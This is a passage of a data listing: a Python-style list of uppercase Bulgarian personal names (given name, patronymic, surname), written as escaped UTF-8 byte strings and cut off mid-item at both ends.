\xd0\xa2\xd0\x95\xd0\xa2\xd0\x98\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\xaf\xd0\x9d\xd0\x95 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\xaf\xd0\x9d\xd0\x95\xd0\x92', '\xd0\x91\xd0\x9e\xd0\x96\xd0\x98\xd0\x94\xd0\x90\xd0\xa0 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x9e\xd0\x9b\xd0\x95\xd0\x9d \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\xa1\xd0\x98\xd0\x94\xd0\x95\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x90\xd0\x9b\xd0\x98\xd0\x9d\xd0\x90 \xd0\xa1\xd0\xa2\xd0\x95\xd0\xa4\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9c\xd0\x98\xd0\x9b\xd0\x95\xd0\x92\xd0\x90-\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92\xd0\x90', '\xd0\x94\xd0\x96\xd0\x95\xd0\x92\xd0\x94\xd0\x95\xd0\xa2 \xd0\x98\xd0\x91\xd0\xa0\xd0\xaf\xd0\x9c \xd0\xa7\xd0\x90\xd0\x9a\xd0\xaa\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x91\xd0\x9e\xd0\x99\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x94\xd0\xa3\xd0\xa0\xd0\xa5\xd0\x90\xd0\x9d \xd0\x9c\xd0\x95\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94 \xd0\x9c\xd0\xa3\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa4\xd0\x90', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\xa1\xd0\xa2\xd0\x95\xd0\xa4\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x92\xd0\xaa\xd0\x9b\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\x9d\xd0\x9a\xd0\x9e \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92 \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x9e\xd0\xa0\xd0\x95\xd0\xa8\xd0\x90\xd0\xa0\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d \xd0\xaf\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x93\xd0\xae\xd0\x97\xd0\x95\xd0\x9b\xd0\x95\xd0\x92', '\xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0 \xd0\x96\xd0\x90\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x99\xd0\x9e\xd0\xa1\xd0\x98\xd0\xa4\xd0\x9e\xd0\x92', '\xd0\x90\xd0\x9d\xd0\x94\xd0\xa0\xd0\x95\xd0\x99 \xd0\x9b\xd0\x90\xd0\x97\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x90\xd0\x9d\xd0\xa2\xd0\x95\xd0\x92', '\xd0\x94\xd0\x90\xd0\x9d\xd0\x98\xd0\x95\xd0\x9b\xd0\x90 \xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x90\xd0\xa0\xd0\x91\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x90\xd0\xa2\xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92', '\xd0\x95\xd0\x9c\xd0\x98\xd0\x9b \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa0\xd0\x90\xd0\x94\xd0\x95\xd0\x92', '\xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d \xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\xa6\xd0\x9e\xd0\x9d\xd0\x95\xd0\x92', '\xd0\x9a\xd0\xa0\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\xa1\xd0\xa2\xd0\x90\xd0\x94\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x90\xd0\x92\xd0\x95\xd0\x9b \xd0\x98\xd0\x9b\xd0\x98\xd0\x95\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\x92\xd0\x95\xd0\xa2\xd0\x9e\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x9d\xd0\x95\xd0\x94\xd0\x95\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9d\xd0\x95\xd0\x94\xd0\x95\xd0\x9b\xd0\xa7\xd0\x95\xd0\x92', '\xd0\xa1\xd0\x92\xd0\x98\xd0\x9b\xd0\x95\xd0\x9d \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9a\xd0\xa0\xd0\x90\xd0\x99\xd0\xa7\xd0\x95\xd0\x92', '\xd0\xa1\xd0\x95\xd0\xa0\xd0\x93\xd0\x95\xd0\x99 \xd0\x94\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x98\xd0\x95\xd0\x92\xd0\x98\xd0\xa7 \xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\x98\xd0\xa8\xd0\x95\xd0\x92', '\xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90 \xd0\x90\xd0\x9b\xd0\x98\xd0\x9f\xd0\x98\xd0\x95\xd0\x92\xd0\x90 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92\xd0\x90', '\xd0\x91\xd0\x9e\xd0\x99\xd0\x9a\xd0\x9e \xd0\xa1\xd0\xa2\xd0\x95\xd0\xa4\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x92\xd0\x95\xd0\x9b\xd0\x98\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x91\xd0\x9e\xd0\xa0\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x90\xd0\x9d\xd0\xac\xd0\x9e \xd0\x95\xd0\x92\xd0\x93\xd0\x95\xd0\x9d\xd0\x98\xd0\x95\xd0\x92 \xd0\xa8\xd0\x90\xd0\xa0\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x95\xd0\x92\xd0\x93\xd0\x95\xd0\x9d\xd0\x98 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x95\xd0\x92', '\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\xa5\xd0\x90\xd0\xa1\xd0\x90\xd0\x9d \xd0\x98\xd0\x9b\xd0\x98\xd0\xaf\xd0\x97 \xd0\xa5\xd0\x90\xd0\x94\xd0\x96\xd0\x98\xd0\xa5\xd0\x90\xd0\xa1\xd0\x90\xd0\x9d', '\xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\x92', '\xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d \xd0\x90\xd0\xa1\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d \xd0\x93\xd0\x95\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92 \xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0 \xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x9e\xd0\xa8\xd0\x95\xd0\x92', '\xd0\x9a\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x98\xd0\xaf\xd0\x9d\xd0\x90 \xd0\x9c\xd0\x95\xd0\xa2\xd0\x9e\xd0\x94\xd0\x98\xd0\x95\xd0\x92\xd0\x90 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9b\xd0\xae\xd0\x91\xd0\x9e\xd0\x9c\xd0\x98\xd0\x9b\xd0\x90 \xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x98\xd0\x9b \xd0\xa0\xd0\x90\xd0\x99\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x98\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x90\xd0\xa1\xd0\x95\xd0\x9d \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x90\xd0\x93\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x95\xd0\x9d\xd0\xa6\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x90\xd0\xa1\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9b\xd0\x90\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x91\xd0\x9e\xd0\x96\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\x9e \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa2\xd0\x90\xd0\x93\xd0\x90\xd0\xa0\xd0\x98\xd0\x9d\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\xa5\xd0\xa0\xd0\x98\xd0\xa1\xd0\xa2\xd0\x9e\xd0\xa4\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x90\xd0\x99\xd0\x94\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\x93\xd0\x9e\xd0\xa0\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\xa6\xd0\x95\xd0\x92', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90\xd0\x99 \xd0\xa5\xd0\x98\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92 \xd0\xa0\xd0\x90\xd0\xa8\xd0\x95\xd0\x92', '\xd0\x93\xd0\x90\xd0\x9b\xd0\x98\xd0\x9d\xd0\x90 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x91\xd0\x90\xd0\x9d\xd0\x9a\xd0\x9e\xd0\x92\xd0\xa1\xd0\x9a\xd0\x90', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x98\xd0\x92\xd0\x95\xd0\x9b\xd0\x98\xd0\x9d \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x90\xd0\xa0\xd0\x98\xd0\x90\xd0\x9d\xd0\x90 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\x94\xd0\x90\xd0\xa0\xd0\x90\xd0\x9a\xd0\xa7\xd0\x98\xd0\x95\xd0\x92\xd0\x90', '\xd0\xa6\xd0\x92\xd0\x95\xd0\xa2\xd0\x9e\xd0\x9c\xd0\x98\xd0\xa0 \xd0\xa6\xd0\x92\xd0\xaf\xd0\xa2\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x98\xd0\xa5\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x90\xd0\x9b\xd0\x95\xd0\x9d\xd0\xa2\xd0\x98\xd0\x9d \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x90\xd0\x9d\xd0\xaf \xd0\x94\xd0\x9e\xd0\x9d\xd0\x95\xd0\x92\xd0\x90 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92\xd0\x90', '\xd0\x92\xd0\x95\xd0\x9d\xd0\xa6\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\x92\xd0\xaa\xd0\xa0\xd0\x91\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\x9e\xd0\xa0\xd0\x9c\xd0\x90\xd0\x9d \xd0\xaf\xd0\x9a\xd0\xa3\xd0\x91\xd0\x9e\xd0\x92 \xd0\x98\xd0\xa1\xd0\x9c\xd0\x90\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\xa0\xd0\xa3\xd0\x9c\xd0\x95\xd0\x9d \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\xa1\xd0\x92\xd0\x95\xd0\xa2\xd0\x9e\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x9a\xd0\x9e\xd0\x9d\xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\xa2\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x99\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x90\xd0\xa5\xd0\x9c\xd0\x95\xd0\x94 \xd0\x94\xd0\x95\xd0\x9c\xd0\x98\xd0\xa0 \xd0\x94\xd0\x9e\xd0\x93\xd0\x90\xd0\x9d', '\xd0\x92\xd0\x95\xd0\x96\xd0\x94\xd0\x98 \xd0\x9b\xd0\x95\xd0\xa2\xd0\x98\xd0\xa4 \xd0\xa0\xd0\x90\xd0\xa8\xd0\x98\xd0\x94\xd0\x9e\xd0\x92', '\xd0\x9d\xd0\x95\xd0\x94\xd0\x96\xd0\x9c\xd0\x98 \xd0\x9d\xd0\x98\xd0\xaf\xd0\x97\xd0\x98 \xd0\x90\xd0\x9b\xd0\x98', '\xd0\xa0\xd0\x95\xd0\x9c\xd0\x97\xd0\x98 \xd0\x94\xd0\xa3\xd0\xa0\xd0\x9c\xd0\xa3\xd0\xa8 \xd0\x9e\xd0\xa1\xd0\x9c\xd0\x90\xd0\x9d', '\xd0\xae\xd0\x9d\xd0\x90\xd0\x9b \xd0\xa2\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c \xd0\xa2\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c', '\xd0\x92\xd0\x90\xd0\x9b\xd0\x95\xd0\x9d\xd0\xa2\xd0\x98\xd0\x9d \xd0\xa2\xd0\x9e\xd0\x9d\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9c\xd0\x98\xd0\x9a\xd0\x95\xd0\x92', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa7\xd0\xa3\xd0\x9a\xd0\x90\xd0\xa0\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x95\xd0\x9c\xd0\x98\xd0\x9b \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x93\xd0\xa3\xd0\xa9\xd0\x95\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b \xd0\x91\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x90\xd0\x9b\xd0\xa4\xd0\x98\xd0\x9d', '\xd0\x9c\xd0\x90\xd0\xaf \xd0\x91\xd0\x9e\xd0\x96\xd0\x98\xd0\x94\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9c\xd0\x90\xd0\x9d\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x90\xd0\x9d\xd0\x90\xd0\xa2\xd0\x9e\xd0\x9b\xd0\x98\xd0\x99 \xd0\x92\xd0\x95\xd0\x9b\xd0\x98\xd0\x9a\xd0\x9e\xd0\x92 \xd0\x99\xd0\x9e\xd0\xa0\xd0\x94\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x95\xd0\x92\xd0\x93\xd0\x95\xd0\x9d\xd0\x98\xd0\x99 \xd0\x92\xd0\x90\xd0\xa1\xd0\x98\xd0\x9b\xd0\x95\xd0\x92 \xd0\xa3\xd0\x97\xd0\xa3\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9a\xd0\x98\xd0\xa0\xd0\x98\xd0\x9b \xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x93\xd0\xa3\xd0\x9c\xd0\x9d\xd0\x95\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x98\xd0\x9b \xd0\x9d\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\xa1\xd0\xa2\xd0\x90\xd0\x9d\xd0\x9a\xd0\x90 \xd0\x9b\xd0\x90\xd0\x9b\xd0\x95\xd0\x92\xd0\x90 \xd0\xa8\xd0\x90\xd0\x99\xd0\x9b\xd0\x95\xd0\x9a\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x91\xd0\x98\xd0\xa1\xd0\x95\xd0\xa0\xd0\x9a\xd0\x90 \xd0\x91\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x90\xd0\x92\xd0\xa0\xd0\x90\xd0\x9c\xd0\x9e\xd0\x92', '\xd0\x98\xd0\xa1\xd0\x9a\xd0\xa0\xd0\x90 \xd0\xa4\xd0\x98\xd0\x94\xd0\x9e\xd0\xa1\xd0\x9e\xd0\x92\xd0\x90 \xd0\x98\xd0\xa1\xd0\x9a\xd0\xa0\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9b\xd0\xae\xd0\x91\xd0\x9e\xd0\x9c\xd0\x98\xd0\xa0 \xd0\xa2\xd0\x9e\xd0\x94\xd0\x9e\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x9f\xd0\x9b\xd0\x90\xd0\x9c\xd0\x95\xd0\x9d \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\xa6\xd0\x95\xd0\x9a\xd0\x9e\xd0\x92', '\xd0\xaf\xd0\x9d\xd0\x90\xd0\x9a\xd0\x98 \xd0\x91\xd0\x9e\xd0\xaf\xd0\x9d\xd0\x9e\xd0\x92 \xd0\xa1\xd0\xa2\xd0\x9e\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x90\xd0\x9d\xd0\x93\xd0\x95\xd0\x9b \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\x94\xd0\x90\xd0\xa1\xd0\x9a\xd0\x90\xd0\x9b\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98\xd0\x95\xd0\x92 \xd0\x9f\xd0\x98\xd0\xa0\xd0\x98\xd0\x9d\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\x94\xd0\x90\xd0\x9d\xd0\x90\xd0\x98\xd0\x9b\xd0\x9e\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0\xd0\x9d\xd0\x95\xd0\x99\xd0\xa7\xd0\x95\xd0\x92', '\xd0\x93\xd0\x98\xd0\x9d\xd0\xa7\xd0\x95 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9a\xd0\x90\xd0\xa0\xd0\x90\xd0\x9c\xd0\x98\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x94\xd0\x95\xd0\x9b\xd0\xaf\xd0\x9d \xd0\xa1\xd0\x9b\xd0\x90\xd0\x92\xd0\xa7\xd0\x95\xd0\x92 \xd0\x9f\xd0\x95\xd0\x95\xd0\x92\xd0\xa1\xd0\x9a\xd0\x98', '\xd0\x98\xd0\x92\xd0\x90\xd0\x9d \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x98\xd0\xa1\xd0\x9a\xd0\xa0\xd0\x90 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90 \xd0\x9c\xd0\x98\xd0\xa5\xd0\x90\xd0\x99\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90-\xd0\x9a\xd0\x9e\xd0\x9f\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9a\xd0\xa0\xd0\x90\xd0\xa1\xd0\x98\xd0\x9c\xd0\x98\xd0\xa0\xd0\x90 \xd0\xa9\xd0\x95\xd0\xa0\xd0\x95\xd0\x92\xd0\x90 \xd0\xa1\xd0\x98\xd0\x9c\xd0\x95\xd0\x9e\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9d\xd0\x98\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x90 \xd0\x98\xd0\x92\xd0\x90\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x91\xd0\x95\xd0\x9b\xd0\x98\xd0\xa8\xd0\x9a\xd0\x98', '\xd0\x90\xd0\x9d\xd0\x93\xd0\x95\xd0\x9b \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x9d\xd0\x90\xd0\x99\xd0\x94\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92', '\xd0\x92\xd0\x9b\xd0\x90\xd0\x94\xd0\x98\xd0\xa1\xd0\x9b\xd0\x90\xd0\x92 \xd0\x95\xd0\x92\xd0\x93\xd0\x95\xd0\x9d\xd0\x98\xd0\x95\xd0\x92 \xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x98\xd0\x9c\xd0\x98\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x90\xd0\xa1\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92 \xd0\x9a\xd0\x9e\xd0\x9b\xd0\x95\xd0\x92', '\xd0\x98\xd0\xa0\xd0\x95\xd0\x9d\xd0\x90 \xd0\x9b\xd0\xae\xd0\x91\xd0\x95\xd0\x9d\xd0\x9e\xd0\x92\xd0\x90 \xd0\xa1\xd0\x9e\xd0\x9a\xd0\x9e\xd0\x9b\xd0\x9e\xd0\x92\xd0\x90', '\xd0\x9f\xd0\x95\xd0\xa2\xd0\xaa\xd0\xa0 \xd0\x9c\xd0\x95\xd0\xa2\xd0\x9e\xd0\x94\xd0\x98\xd0\x95\xd0\x92 \xd0\x9f\xd0\x95\xd0\xa2\xd0\xa0\xd0\x9e\xd0\x92', '\xd0\x93\xd0\x95\xd0\x9e\xd0\xa0\xd0\x93\xd0\x98 \xd0\xa7\xd0\x90\xd0\x92\xd0\x94\xd0\x90\xd0\xa0\xd0\x9e\xd0\x92 \xd0\x90\xd0\x9d\xd0\x90\xd0\xa1\xd0\xa2\xd0\x90\xd0\xa1\xd0\x9e\xd0\x92', '\xd0\x94\xd0\x90\xd0\xa0\xd0\x98\xd0\x9d 